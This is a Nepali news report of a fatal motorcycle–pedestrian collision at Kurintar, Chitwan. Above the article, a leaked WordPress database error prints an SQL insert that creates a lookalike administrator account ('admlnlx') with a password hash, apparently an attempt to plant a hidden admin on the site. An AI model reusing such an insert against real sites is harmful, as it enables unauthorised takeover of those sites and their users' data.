WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BF8WxCgWuEcVK8pb1IYlCZf6.jVebh0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 07:30:22', '', 'admlnlx', 'admlnlx')
विनोद श्रेष्ठ,चितवन माघ २६-
पृथ्वी राजमार्ग अन्र्तरगत कुरिनटारमा दुई मोटरसाइकलले पालैपालो ठक्कर दिदा पैदल यात्रीको ज्यान गएको छ । मोटरसाइकलमा सवार २ जना गम्भीर घाइते भएका छन् । बुधबार वेलुका मुग्लिनबाट काठमाण्डौ जादै गरेको ग८ प ६५६७ नम्मरको मोटरसाइकल र ग ९ प ५३५१ नम्बरको अर्को मोटरसाइकलले पैदल यात्री चितवन दारेचोक ३ निवासी २५ वर्षिय पुर्ण बहादुर चेपाङ पालैपालो ठक्कर दिएको थियो । ठक्करवाट घाइते भएका चेपाङको उपचारका लागि अस्पताल लैजादै गर्दा वाटोमानै मृत्यु भएको इलाका प्रहरी कार्यालय मुग्लिनका प्रहरी निरीक्षक योगेन्द्र हमालले जानकारी दिनुभयो ।
घटनामा घाइते भएका मोटरसाइकल चालक दारेचोक ३ का १८ वर्षिय जापान मगर र दारेचोक ३ कुरिनटारका २५ वर्षिय सुसन उप्रेतीलाई उपचारका लागी काठमाण्डौ लगिएको हमालले जानाकारी दिनुभयो । अर्का मोटरसाइकल चालक भने प्रहरी नियन्त्रणमा छन् । उनि भारतको मोतिहारी घर भई कुरिनटारमा मोटरसाइकल वर्क शप सञ्चालन गर्दै आएका सुरेस पण्डित रहेको प्रहरीले जनाकारी दिएको छ ।